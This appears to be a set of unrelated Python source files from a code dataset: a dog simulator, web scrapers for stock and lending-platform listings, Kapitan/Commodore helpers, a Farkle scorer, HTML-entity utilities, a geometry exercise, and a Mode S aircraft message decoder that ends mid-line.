print()\n\n\nif __name__ == '__main__':\n print()\n print('Welcome to Super Easy Dog Simulator')\n print()\n options = 'Options:\\n\\n' \\\n '1: Adopt Dog\\n' \\\n '2: Feed Dog\\n' \\\n '3: Walk Dog\\n' \\\n '4: Check On Dogs \\n' \\\n '\\n' \\\n 'q: Quit'\n\n dog_manager = DogManager()\n while True:\n print(options)\n decision = input('Your Choice: ').strip() # strip() takes out leading and trailing whitespace\n print()\n if decision == '1':\n dog_manager.adoptDog()\n elif decision == '2':\n dog_manager.feedDog()\n elif decision == '3':\n dog_manager.walkDog()\n elif decision == '4':\n dog_manager.print_dog_house()\n time.sleep(1)\n elif decision == 'q':\n break\n else:\n print('Sorry.', decision, 'is an invalid decision. Try Again')\n print()\n time.sleep(.5)\n print()\n print('Thank You For Using Super Easy Dog Simulator. See you Later!')\n print()\n","sub_path":"basic examples/dog_simulator.py","file_name":"dog_simulator.py","file_ext":"py","file_size_in_byte":8529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"534733539","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Oct 6 18:30:26 2018\n\n@author: Administrator\n\"\"\"\nimport re\nimport requests\nfrom bs4 import BeautifulSoup\ndef getHtml(url):\n try:\n r=requests.get(url)\n r.raise_for_status()\n r.encoding=r.apparent_encoding\n return r.text\n except:\n print('wrong!')\n return ''\n \ndef opreate(list1,list2,text):\n z=1\n soup=BeautifulSoup(text,'lxml')\n for i in soup.find_all('li'): \n for j in i.children:\n if j:\n try:\n z+=1\n #t=(j.attrs['href']).split('/')[-1]\n t=re.findall('s[hz]\\d{6}',j.attrs['href'])[0]\n #注:re.findall返回的是列表类型,所以要加[0],确保t是字符串\n if t[0:2]=='sz':\n list1.append(j.get_text())\n elif t[0:2]=='sh':\n list2.append(j.string)\n else:\n continue\n except: \n continue\n else:\n continue\n print('the length is',z) \n \ndef printText(list1,list2):\n c,q=(1,1)\n print('深圳')\n for i in list1:\n print(i)\n c=c+1\n print('上海')\n for i in list2:\n print(i)\n q=q+1\n print(c+q)\n\n \ndef main():\n url='http://quote.eastmoney.com/stocklist.html'\n a=[]\n b=[]\n t=getHtml(url)\n opreate(a,b,t)\n printText(a,b)\nmain()\n \n","sub_path":"网络爬虫/股票信息爬虫.py","file_name":"股票信息爬虫.py","file_ext":"py","file_size_in_byte":1388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"391383627","text":"# encoding:utf-8\nimport json\nimport os\nimport time\nfrom urllib import request\nimport re\nimport loguru\nfrom bs4 import BeautifulSoup\n\nlogger = loguru.logger\nfolder = './data'\nheaders = {\n 'Referer': 'http://xueshu.baidu.com/',\n \"Upgrade-Insecure-Requests\": \"1\",\n \"Connection\": \"keep-alive\",\n \"Cache-Control\": \"max-age=0\",\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36',\n \"Accept-Language\": \"zh-CN,zh;q=0.9,en;q=0.8,la;q=0.7,pl;q=0.6\",\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\"\n}\n\nplatforms = ['国资控股', '国资参股', '上市控股', '上市参股', '风投系', '银行系', '民营系']\n\n\ndef down_html(url, retry=3):\n try:\n req = request.Request(url=url, headers=headers)\n resp = request.urlopen(req, timeout=5)\n\n if resp.status != 200:\n logger.error('url open error. url = {}'.format(url))\n html_doc = resp.read()\n if html_doc is None or html_doc.strip() == '':\n logger.error('NULL html_doc')\n return html_doc\n except Exception as e:\n logger.error(\"failed and retry to download url {}\".format(url))\n if retry > 0:\n time.sleep(1)\n retry -= 1\n return download_html(url)\n\n\ndef main():\n base_url = \"https://www.wdzj.com/dangan/search?filter¤tPage=\"\n\n for p in range(1, 21):\n url = base_url+str(p)\n logger.info(\"page = %s\" % (str(p)))\n html = down_html(url)\n soup = BeautifulSoup(html, 'lxml')\n terraceList = soup.find('ul', {'class': 'terraceList'})\n items = terraceList.findAll('li', {'class': 'item'})\n for item in items:\n entity = {}\n itemTitle = item.find('div', {'class': 'itemTitle'})\n entity['title'] = itemTitle.h2.text.strip().split('\\n')[0]\n entity['tags'] = [t.text.strip() for t in itemTitle.findAll(\n 'div', {'class': 'itemTitleTag tag'})]\n\n clearfix = item.find('div', {'class': 'itemCon clearfix'})\n itemConLeft = clearfix.find('a', {'class': 'itemConLeft'})\n entity['boxs'] = [box.text.strip() for box in itemConLeft.findAll(\n 'div', {'class': 'itemConBox'})]\n fname = entity['title']+'.json'\n json.dump(entity, open(os.path.join(folder, fname), 'w'))\n logger.info(\"%s dump!\" % (str(entity['title'])))\n\n\ndef post_process():\n f1 = open('neo4j_format_entity.txt', 'w')\n f2 = open('neo4j_format_relation.txt', 'w')\n\n for fname in os.listdir(folder)[:]:\n organ = {}\n item = json.load(open(os.path.join(folder, fname), 'r'))\n title = item['title'].strip()\n platform = ''\n address = item['boxs'][2].strip()\n address = address[len('注册地:'):].split('|')\n for p in platforms:\n if ''.join(item['tags']).find(p) != -1:\n platform = p\n break\n if platform == '':\n logger.info('remove %s' % (title))\n os.remove(os.path.join(folder, fname))\n\n organ['名称'] = item['title'].split('\\n')[0]\n for tag in item['tags']:\n try:\n k, v = tag.split('\\n')[0].strip(), tag.split('\\n')[2].strip()\n organ[k] = v\n except IndexError:\n continue\n organ['参考利率'] = item['boxs'][0].split('\\n')[1].strip()\n organ['待还余额'] = item['boxs'][1].split(':')[1].strip()\n organ['上线时间'] = item['boxs'][3].split(':')[1].strip()\n tmp = re.sub(r'\\s', '', item['boxs'][-1]).strip()\n organ['网友印想'] = tmp[5:tmp.find('综合评分')+1]\n organ['综合评分'] = tmp[tmp.find('综合评分')+4:].split(',')[0]\n organ['点评人数'] = tmp[tmp.find('综合评分')+4:].split(',')[1]\n organ['注册地'] = address[0]\n # title platform address\n entity_organ = \"(%s:机构 {\" % (organ['名称'])\n for k, v in organ.items():\n if k == '名称':\n entity_organ += \"%s:'%s'\" % (k, v)\n else:\n entity_organ += \",%s:'%s'\" % (k, v)\n entity_organ += \"}),\\n\"\n entity_platform = \"(%s:平台 %s),\\n\" % (platform, {'名称': platform})\n entity_address = \"(%s:省份 %s),\\n\" % (\n organ['注册地'], {'名称': organ['注册地']})\n rel_organ_platform = '(%s)-[:属于]->(%s),\\n' % (organ['名称'], platform)\n rel_organ_address = '(%s)-[:注册]->(%s),\\n' % (organ['名称'], organ['注册地'])\n f1.write(entity_organ)\n f1.write(entity_platform)\n f1.write(entity_address)\n f2.write(rel_organ_platform)\n f2.write(rel_organ_address)\n\n f1.close()\n f2.close()\n\n\n# 实体:平台,机构,注册地\nif __name__ == '__main__':\n # main()\n post_process()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"232010062","text":"import collections\nimport json\nimport shutil\nimport os\nfrom pathlib import Path as P\nfrom typing import Callable\n\nimport click\nimport requests\nimport yaml\n\n# pylint: disable=redefined-builtin\nfrom requests.exceptions import ConnectionError, HTTPError\nfrom url_normalize import url_normalize\nfrom kapitan import cached\nfrom kapitan import targets\nfrom kapitan import defaults\nfrom kapitan.cached import reset_cache as reset_reclass_cache\nfrom kapitan.refs.base import RefController, PlainRef\nfrom kapitan.refs.secrets.vaultkv import VaultBackend\n\nfrom commodore import __install_dir__\nfrom commodore.config import Config\n\n\nArgumentCache = collections.namedtuple(\"ArgumentCache\", [\"inventory_path\"])\n\n\nclass FakeVaultBackend(VaultBackend):\n def __init__(self):\n \"init FakeVaultBackend ref backend type\"\n super().__init__(None)\n\n def __getitem__(self, ref_path):\n return PlainRef(ref_path)\n\n\nclass ApiError(Exception):\n pass\n\n\ndef yaml_load(file):\n \"\"\"\n Load single-document YAML and return document\n \"\"\"\n with open(file, \"r\") as f:\n return yaml.safe_load(f)\n\n\ndef yaml_load_all(file):\n \"\"\"\n Load multi-document YAML and return documents in list\n \"\"\"\n with open(file, \"r\") as f:\n return list(yaml.safe_load_all(f))\n\n\ndef yaml_dump(obj, file):\n \"\"\"\n Dump obj as single-document YAML\n \"\"\"\n with open(file, \"w\") as outf:\n yaml.dump(obj, outf)\n\n\ndef yaml_dump_all(obj, file):\n \"\"\"\n Dump obj as multi-document YAML\n \"\"\"\n with open(file, \"w\") as outf:\n yaml.dump_all(obj, outf)\n\n\ndef lieutenant_query(api_url, api_token, api_endpoint, api_id):\n try:\n r = requests.get(\n url_normalize(f\"{api_url}/{api_endpoint}/{api_id}\"),\n headers={\"Authorization\": f\"Bearer {api_token}\"},\n )\n except ConnectionError as e:\n raise ApiError(f\"Unable to connect to Lieutenant at {api_url}\") from e\n try:\n resp = json.loads(r.text)\n except json.JSONDecodeError:\n resp = {\"message\": \"Client error: Unable to parse JSON\"}\n try:\n r.raise_for_status()\n except HTTPError as e:\n extra_msg = \".\"\n if r.status_code >= 400:\n extra_msg = f\": {resp['reason']}\"\n raise ApiError(f\"API returned {r.status_code}{extra_msg}\") from e\n else:\n return resp\n\n\ndef _verbose_rmtree(tree, *args, **kwargs):\n click.echo(f\" > deleting {tree}/\")\n shutil.rmtree(tree, *args, **kwargs)\n\n\ndef clean_working_tree(config: Config):\n # Defining rmtree as a naked Callable means that mypy won't complain about\n # _verbose_rmtree and shutil.rmtree having slightly different signatures.\n rmtree: Callable\n if config.debug:\n rmtree = _verbose_rmtree\n else:\n rmtree = shutil.rmtree\n click.secho(\"Cleaning working tree\", bold=True)\n rmtree(\"inventory\", ignore_errors=True)\n rmtree(\"dependencies\", ignore_errors=True)\n rmtree(\"compiled\", ignore_errors=True)\n rmtree(\"catalog\", ignore_errors=True)\n\n\n# pylint: disable=too-many-arguments\ndef kapitan_compile(\n config: Config,\n target=\"cluster\",\n output_dir=\"./\",\n search_paths=None,\n fake_refs=False,\n fetch_dependencies=True,\n reveal=False,\n):\n if not search_paths:\n search_paths = []\n search_paths = search_paths + [\n \"./\",\n __install_dir__,\n ]\n reset_reclass_cache()\n refController = RefController(\"./catalog/refs\")\n if fake_refs:\n refController.register_backend(FakeVaultBackend())\n click.secho(\"Compiling catalog...\", bold=True)\n cached.args[\"compile\"] = ArgumentCache(inventory_path=\"./inventory\")\n targets.compile_targets(\n inventory_path=\"./inventory\",\n search_paths=search_paths,\n output_path=output_dir,\n targets=[target],\n parallel=4,\n labels=None,\n ref_controller=refController,\n verbose=config.trace,\n prune=False,\n indent=2,\n reveal=reveal,\n cache=False,\n cache_paths=None,\n fetch_dependencies=fetch_dependencies,\n validate=False,\n schemas_path=\"./schemas\",\n jinja2_filters=defaults.DEFAULT_JINJA2_FILTERS_PATH,\n )\n\n\ndef rm_tree_contents(basedir):\n \"\"\"\n Delete all files in directory `basedir`, but do not delete the directory\n itself.\n \"\"\"\n basedir = P(basedir)\n if not basedir.is_dir():\n raise ValueError(\"Expected directory as argument\")\n for f in basedir.glob(\"*\"):\n if f.name.startswith(\".\"):\n # pathlib's glob doesn't filter hidden files, skip them here\n continue\n if f.is_dir():\n shutil.rmtree(f)\n else:\n os.unlink(f)\n\n\ndef relsymlink(srcdir, srcname, destdir, destname=None):\n if destname is None:\n destname = srcname\n # pathlib's relative_to() isn't suitable for this use case, since it only\n # works for dropping a path's prefix according to the documentation. See\n # https://docs.python.org/3/library/pathlib.html#pathlib.PurePath.relative_to\n link_src = os.path.relpath(P(srcdir) / srcname, start=destdir)\n link_dst = P(destdir) / destname\n if link_dst.exists():\n os.remove(link_dst)\n os.symlink(link_src, link_dst)\n\n\ndef delsymlink(linkname: P, debug=False):\n \"\"\"\n A convenience function to remove a symlink.\n\n Ensures the target path actually exists and is a symlink before deleting, or\n noops.\n \"\"\"\n\n # This will also be False in case it doesn't exist.\n if linkname.is_symlink():\n if debug:\n click.echo(f\"Deleting symlink: {linkname}\")\n linkname.unlink()\n else:\n if debug:\n click.echo(f\"Trying to delete non-symlink path {linkname}. No deleting!\")\n","sub_path":"commodore/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":5731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"124379195","text":"\"\"\"\n\twritten and tested in Python 3.3.6\n\"\"\"\n\nfrom random import randint\nimport collections\n\ndef score(my_roll, sides=6):\n\t\"\"\"\n\t\tCalculate a Farkle score using the traditional scoring method, which is:\n\t\t\t4 1s: 2,000 points\n\t\t\t3 1s: 1,000 points\n\t\t\tSingle 1: 100 points\n\t\t\tSingle 5: 50 points\n\t\t\tTriple of any non-1 number: 100 x number showing\n\t\t\tQuadruple of any non-1 number: Double the triple score\n\t\t\t\n\t\tNotes:\n\t\t\t- Doubles score nothing (unless a 1 or a 5) as above\n\t\t\t- All scoring dice must be rolled in a single turn (i.e. they\n\t\t\tare not additive over turns)\n\t\t\t- Rolling all 6 will be two sets and scored accordingly\n\t\t\t\t[4] + [2]\n\t\t\t\t[3] + [3]\n\t\t\t\t[2] + [2] + [2]\n\t\t\t\t\n\t\tExamples:\n\t\t\t1,1,1,5,5,5 ==> 1250 (1000 for 1s + 250 for 3 5s)\n\t\t\t1,1,1,1,6,6 ==> 2000 (2000 for 4 1s)\n\t\t\t5,3,6,5,3,3 ==> 400 (300 for 3 3s + 100 for 2 5s)\n\t\t\t1,2,2,3,3,5 ==> 150 (100 for a 1 and 50 for a 5)\n\t\"\"\"\n\t#create a table to hold the count of each die roll\n\tdice_array = [0] * sides\n\tscore = 0\n\tcounts = collections.Counter(my_roll)\n\tprint(counts)\n\t#add up the number appearances of each die roll and store it in the table\n\t\n\tfor dice in my_roll:\n\t\tdice_array[dice-1] += 1\n\n\t\"\"\"\n\t\tbased on the above scoring, determine the MAXIMUM score; in actual Farkle the\n\t\tplayer would choose which die to 'bank' and which to re-roll\n\t\"\"\"\n\tfor (dice, count) in enumerate(dice_array, start=1):\t\t\n\t\tif dice == 1:\n\t\t\tif count == 6: score += 2200\n\t\t\tif count == 5: score += 2100\t\t\t\n\t\t\tif count == 4: score += 2000\n\t\t\tif count == 3: score += 1000\n\t\t\tif count in [1, 2]: score += (count * 100)\n\t\telse:\n\t\t\tif count >= 4: score += (dice * 200)\n\t\t\tif count >= 3: score += (dice * 100)\n\t\t\tif (dice == 5 and count != 3): score += (count * 50) \n\n\treturn score\n\t\t\n#test cases\nwhile True:\n\troll = input(\"Enter 6 values (1-6) separated by a space: \")\n\troll = [randint(1,6) for i in range(0, 6)] if roll == \"\" else [int(i) for i in roll.split(' ')]\n\tprint(str(score(roll)) + \" : \" + str(roll))","sub_path":"python/Personal Projects/farkle/highest_roll.py","file_name":"highest_roll.py","file_ext":"py","file_size_in_byte":1994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"31322326","text":"#!/usr/bin/env python\n\n# This is a hacked-up version of the arietta module from Akane, with\n# the XSPF reader and ID3 tag support commented out.\n\n# This program is free software and is released under the terms of the\n# following MIT License:\n\n## START OF LICENSE ##\n\"\"\"\nCopyright (c) 2012 Daniel Sim (foxhead128)\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n\"\"\"\n## END OF LICENSE ##\n\ndef do_nothing():\n return\n\nimport os.path\nimport sys\n\ntry:\n filename = __file__\nexcept:\n __file__ = sys.executable\nelse:\n del filename\napp_lib = os.path.join(os.path.dirname(os.path.realpath(__file__)))\nsys.path.append(app_lib)\n\nif sys.version_info[0] >= 3:\n def unicode(data):\n return str(data)\n def unichr(data):\n return chr(data)\n# import stagger\n# from html.parser import HTMLParser\n from html.entities import name2codepoint\nelse:\n# import id3\n# import HTMLParser\n from htmlentitydefs import name2codepoint\n\nimport re\n\ntry: from urllib.parse import unquote, quote\nexcept ImportError:\n try: from urllib import unquote, quote\n except:\n do_nothing()\n\nfrom xml.sax.saxutils import escape, quoteattr\n\ntry: from urllib.request import urlopen\nexcept ImportError:\n try: from urllib2 import urlopen\n except:\n do_nothing()\n\n_entity_re = re.compile(r'&(?:(#)(\\d+)|([^;]+));')\n\ndef get_mimetype(filename):\n if os.path.exists(metaunquote(filename).replace(\"file://\", \"\")):\n try: f = urlopen(\"file://\" + metaunquote(filename).replace(\"file://\",\"\"))\n except:\n print(\"Error! Something went wrong!\")\n else:\n return f.headers['content-type']\n else:\n print(\"Error! File does not exist!\")\n return None\n\ndef _repl_func(match):\n if match.group(1): # Numeric character reference\n return unichr(int(match.group(2)))\n else:\n return unichr(name2codepoint[match.group(3)])\n\ndef handle_html_entities(data):\n return unescape(_entity_re.sub(_repl_func, data))\n \ndef metaunquote(data):\n return handle_html_entities(unquote(data))\n\ndef unescape(text):\n \"\"\"Removes HTML or XML character references \n and entities from a text string.\n keep &, >, < in the source code.\n from Fredrik Lundh\n http://effbot.org/zone/re-sub.htm#unescape-html\n \"\"\"\n def fixup(m):\n text = m.group(0)\n if text[:2] == \"&#\":\n # character reference\n try:\n if text[:3] == \"&#x\":\n return unichr(int(text[3:-1], 16))\n else:\n return unichr(int(text[2:-1]))\n except ValueError:\n print(\"Value error!\")\n pass\n else:\n # named entity\n try:\n if text[1:-1] == \"amp\":\n text = \"&amp;\"\n elif text[1:-1] == \"gt\":\n text = \"&gt;\"\n elif text[1:-1] == \"lt\":\n text = \"&lt;\"\n else:\n print(text[1:-1])\n text = unichr(name2codepoint[text[1:-1]])\n except KeyError:\n print(\"Key error!\")\n pass\n return text # leave as is\n return re.sub(\"&#?\\w+;\", fixup, text)\n\n# The following function scans a file for ID3 tags, using either stagger (if Python 3) or id3 (if Python 2). It then returns a dictionary containing whatever tags it was able to retrieve:\n\"\"\"def get_tags(path):\n if os.path.exists(metaunquote(path.replace(\"file://\", \"\"))):\n path = metaunquote(path.replace(\"file://\", \"\"))\n elif os.path.exists(path.replace(\"file://\", \"\")):\n path = path.replace(\"file://\", \"\")\n if os.path.exists(path):\n if sys.version_info[0] >= 3:\n try: tags = stagger.read_tag(metaunquote(path.replace(\"file://\", \"\")))\n except:\n tags = \"\"\n title = \"(Untitled)\"\n artist = \"Unknown Artist\"\n album = \"Unknown Album\"\n date = \"Unknown\"\n genre = \"Unknown\"\n if sys.version_info[0] >= 3:\n try: tags.title\n except:\n do_nothing()\n else:\n if type(tags.title) is str and tags.title != \"\":\n try: title = tags.title\n except:\n do_nothing()\n try: tags.artist\n except:\n do_nothing()\n else:\n if type(tags.artist) is str and tags.artist != \"\":\n try: artist = tags.artist\n except:\n do_nothing()\n try: tags.album\n except:\n do_nothing()\n else:\n if type(tags.album) is str and tags.album != \"\":\n try: album = tags.album\n except:\n do_nothing()\n try: tags.date\n except:\n do_nothing()\n else:\n if type(tags.date) is str and tags.date != \"\":\n try: date = tags.date\n except:\n do_nothing()\n try: tags.genre\n except:\n do_nothing()\n else:\n if type(tags.genre) is str and tags.genre != \"\":\n try: genre = tags.genre\n except:\n do_nothing()\n else:\n path = metaunquote(path.replace(\"file://\", \"\")).replace(\"%20\", \" \")\n try: id3.title(path)\n except:\n do_nothing()\n else:\n if type(id3.title(path)) is unicode and id3.title(path) != \"\":\n try: title = id3.title(path)\n except:\n do_nothing()\n try: id3.artist(path)\n except:\n do_nothing()\n else:\n if type(id3.artist(path)) is unicode and id3.artist(path) != \"\":\n try: artist = id3.artist(path)\n except:\n do_nothing()\n try: id3.album(path)\n except:\n do_nothing()\n else:\n if type(id3.album(path)) is unicode and id3.album(path) != \"\":\n try: album = id3.album(path)\n except:\n do_nothing()\n try: id3.date(path)\n except:\n do_nothing()\n else:\n if type(id3.date(path)) is unicode and id3.date(path) != \"\":\n try: date = id3.date(path)\n except:\n do_nothing()\n try: id3.genre(path)\n except:\n do_nothing()\n else:\n if type(id3.genre(path)) is unicode and id3.genre(path) != \"\":\n try: genre = id3.genre(path)\n except:\n do_nothing()\n return {'title' : unicode(title), 'artist' : unicode(artist), 'album' : unicode(album), 'year' : unicode(date), 'date' : unicode(date), 'genre' : unicode(genre)}\n\n# This is for reading XSPF files:\nif sys.version_info[0] >= 3:\n class XSPFReader(HTMLParser):\n event_list = []\n event_contents = \"\"\n tag = \"\"\n def handle_starttag(self, tag, attrs):\n self.tag = tag\n def handle_startendtag(self, tag, attrs):\n self.tag = tag\n self.attributes = attrs\n def handle_endtag(self, tag):\n self.tag = \"\"\n def handle_data(self, data):\n if self.tag == \"playlist\":\n self.playlist = []\n elif self.tag == \"location\":\n self.playlist.append(data)\nelse:\n class XSPFReader(HTMLParser.HTMLParser):\n event_list = []\n event_contents = \"\"\n tag = \"\"\n def handle_starttag(self, tag, attrs):\n self.tag = tag\n def handle_startendtag(self, tag, attrs):\n self.tag = tag\n self.attributes = attrs\n def handle_endtag(self, tag):\n self.tag = \"\"\n def handle_data(self, data):\n if self.tag == \"playlist\":\n self.playlist = []\n elif self.tag == \"location\":\n self.playlist.append(data)\"\"\"\n","sub_path":"accessories/konoe/konoe_lib/manila.py","file_name":"manila.py","file_ext":"py","file_size_in_byte":9191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"362497467","text":"#gyakorlás\n\nprint(\"1 - Háromszög\")\nprint(\"2 - Kör\")\nprint(\"3 - Téglalap\")\nprint(\"4 - Nyolcszög\")\nv=input(\"Milyen alakztattal szeretnél dolgozni?\")\nif v==\"1\":\n\tharomszogKerulet()\n\tharomszogTerulet()\nif v==\"2\":\n\tkorKerulet()\n\tkorTerulet()\nif v==\"3\":\n\tteglalapKerulet()\n\tteglalapTerulet()\nif v==\"4\":\n\tnyolcszogKerulet()\n\tnyolcszogTerulet()\n \ndef triangle(a,b,c):\n print(\"perimeter: \",a+b+c)\ntriangle(3,4,5)\n\ndef triangle(a,b,c):\n print(\"ker: \",a+b+c)\na = input(\"a oldal: \")\nb = input(\"b oldal: \")\nc = input(\"c oldal: \")\ntriangle(a,b,c)\n","sub_path":"kerterlt.py","file_name":"kerterlt.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"255575142","text":"# Import functions and libraries\nfrom __future__ import division\nimport numpy as np, matplotlib.pyplot as plt\nfrom numpy import *\nfrom numpy.fft import *\nfrom matplotlib.pyplot import *\nfrom rtlsdr import RtlSdr\nimport threading,time, queue\n\nfrom bokeh.plotting import figure, show\nfrom bokeh.io import push_notebook, output_notebook\nfrom bokeh.models import ColumnDataSource\nfrom bokeh.models.glyphs import Oval, Text, Circle\nfrom bokeh.tile_providers import get_provider\nimport math\nfrom IPython.display import clear_output\nimport sys\n\noutput_notebook()\n\ndef bit2byte( bits ):\n msg = np.zeros( MODES_LONG_MSG_BYTES, dtype='int' )\n\n # Pack bits into bytes */\n for i in r_[:MODES_LONG_MSG_BITS:8]:\n for j in r_[:8]:\n msg[ i // 8] = msg[ i // 8] + (int(bits[i+j]) << (7-j))\n return msg\n\n\nclass Plane:\n addr = -1\n flightnum = 'UNKNOWN'\n position = (-1,-1)\n planetype = 0\n lat0 = 0\n lat1 = 0\n lon0 = 0\n lat0 = 0\n time0 = -1\n time1 = -1\n heading = 0\n \n def __init__( self, addr):\n self.addr = addr\n \n def addplanetype( self, planetype ):\n self.planetype = planetype\n \n def addflightnum( self, flightnum ):\n self.flightnum = flightnum\n \n def addposition( self, position ):\n self.position = position\n\n \nMODES_LONG_MSG_BITS = 112\nMODES_SHORT_MSG_BITS = 56\nMODES_LONG_MSG_BYTES = (112//8)\nMODES_SHORT_MSG_BYTES = (56//8)\n\nmodes_checksum_table = [\n0x3935ea, 0x1c9af5, 0xf1b77e, 0x78dbbf, 0xc397db, 0x9e31e9, 0xb0e2f0, 0x587178,\n0x2c38bc, 0x161c5e, 0x0b0e2f, 0xfa7d13, 0x82c48d, 0xbe9842, 0x5f4c21, 0xd05c14,\n0x682e0a, 0x341705, 0xe5f186, 0x72f8c3, 0xc68665, 0x9cb936, 0x4e5c9b, 0xd8d449,\n0x939020, 0x49c810, 0x24e408, 0x127204, 0x093902, 0x049c81, 0xfdb444, 0x7eda22,\n0x3f6d11, 0xe04c8c, 0x702646, 0x381323, 0xe3f395, 0x8e03ce, 0x4701e7, 0xdc7af7,\n0x91c77f, 0xb719bb, 0xa476d9, 0xadc168, 0x56e0b4, 0x2b705a, 0x15b82d, 0xf52612,\n0x7a9309, 0xc2b380, 0x6159c0, 0x30ace0, 0x185670, 0x0c2b38, 0x06159c, 0x030ace,\n0x018567, 0xff38b7, 0x80665f, 0xbfc92b, 0xa01e91, 0xaff54c, 0x57faa6, 0x2bfd53,\n0xea04ad, 0x8af852, 0x457c29, 0xdd4410, 0x6ea208, 0x375104, 0x1ba882, 0x0dd441,\n0xf91024, 0x7c8812, 0x3e4409, 0xe0d800, 0x706c00, 0x383600, 0x1c1b00, 0x0e0d80,\n0x0706c0, 0x038360, 0x01c1b0, 0x00e0d8, 0x00706c, 0x003836, 0x001c1b, 0xfff409,\n0x000000, 0x000000, 0x000000, 0x000000, 0x000000, 0x000000, 0x000000, 0x000000,\n0x000000, 0x000000, 0x000000, 0x000000, 0x000000, 0x000000, 0x000000, 0x000000,\n0x000000, 0x000000, 0x000000, 0x000000, 0x000000, 0x000000, 0x000000, 0x000000\n] \n\n\ndef modesChecksum(msg, bits):\n crc = 0\n\n if (bits == 112):\n offset = 0\n else:\n offset = 112 - 56\n\n for j in r_[:bits]:\n\n byte = j//8\n bit = j%8\n bitmask = 1 << (7 - bit)\n\n # If bit is set, xor with corresponding table entry.\n if (msg[byte] & bitmask):\n crc ^= modes_checksum_table[j+offset]\n \n return crc # 24 bit checksum. \n\n\ndef modesMessageLenByType( type ):\n if ( type == 16 or type == 17 or type == 19 or type == 20 or type == 21):\n return MODES_LONG_MSG_BITS\n else:\n return MODES_SHORT_MSG_BITS\n\n \ndef fixSingleBitErrors( msg, bits ):\n for j in r_[:8]:\n byte = j // 8\n bitmask = 1 << (7 - (j%8))\n \n aux = msg[:bits//8]\n \n crc1 = (aux[(bits//8)-3] << 16) |(aux[(bits//8)-2] << 8) |aux[(bits//8)-1];\n crc2 = modesChecksum(aux,bits)\n \n crcok = (crc1 == crc2)\n if ( crcok ):\n for i in r_[:bits//8]:\n msg[i] = aux[i]\n \n return crcok\n\n \ndef NL( rlat ):\n # A.1.7.2.d (page 9)\n NZ = 15\n return np.floor( 2 * np.pi / \n (np.arccos( 1 - (1 - np.cos( np.pi / (2 * NZ )) ) \n / np.cos( np.pi / 180 * abs(rlat) ) ** 2 )))\n\n\ndef cprN( lat, isodd):\n nl = NL(lat) - isodd;\n if (nl < 1):\n nl = 1;\n return nl;\n\n\ndef Dlon( lat, isodd):\n return 360.0 / cprN(lat, isodd)\n\n \ndef cprmod( a, b ):\n res = a % b;\n if (res < 0):\n res = res + b;\n return res;\n\n\ndef decodeCPR( plane ):\n AirDlat0 = 360.0 / 60\n AirDlat1 = 360.0 / 59\n \n lat0 = plane.lat0\n lat1 = plane.lat1\n lon0 = plane.lon0\n lon1 = plane.lon1\n \n j = np.floor(((59*lat0 - 60*lat1) / 131072) + 0.5)\n \n rlat0 = AirDlat0 * (cprmod(j,60) + lat0 / 131072)\n rlat1 = AirDlat1 * (cprmod(j,59) + lat1 / 131072)\n \n if (rlat0 >= 270):\n rlat0 = rlat0 - 360\n \n if (rlat1 >= 270):\n rlat1 = rlat1 - 360\n \n if (NL(rlat0) != NL(rlat1)):\n return;\n \n if (plane.time0 > plane.time1) :\n\n # Use even packet.\n ni = cprN(rlat0,0);\n m = np.floor((((lon0 * (NL(rlat0)-1)) -\n (lon1 * NL(rlat0))) / 131072) + 0.5);\n lon = Dlon(rlat0,0) * (cprmod(m,ni)+lon0/131072);\n lat = rlat0;\n else:\n # Use odd packet\n ni = cprN(rlat1,1);\n m = np.floor((((lon0 * (NL(rlat1)-1)) - \n (lon1 * NL(rlat1))) / 131072) + 0.5);\n lon = Dlon(rlat1,1) * (cprmod(m,ni)+lon1/131072);\n lat = rlat1;\n if ( lon > 180 ):\n lon = lon - 360;\n \n plane.addposition( (lat, lon) )\n\n\ndef decodeModesMessage( msg, plane_list, log ):\n \n ais_charset = np.array( list(\"?ABCDEFGHIJKLMNOPQRSTUVWXYZ????? ???????????????0123456789??????\"))\n \n # Get the message type ASAP as other operations depend on this\n msgtype = msg[0] >> 3\n msgbits = modesMessageLenByType(msgtype)\n \n \n # Get checksum. CRC is always the last three bytes.\n crc = (msg[(msgbits//8)-3] << 16) | (msg[(msgbits//8)-2] << 8) | msg[(msgbits//8)-1];\n crc2 = modesChecksum(msg,msgbits)\n crcok = (crc == crc2)\n \n # Correct 1-bit error\n if (not crcok):\n crcok = fixSingleBitErrors( msg, msgbits 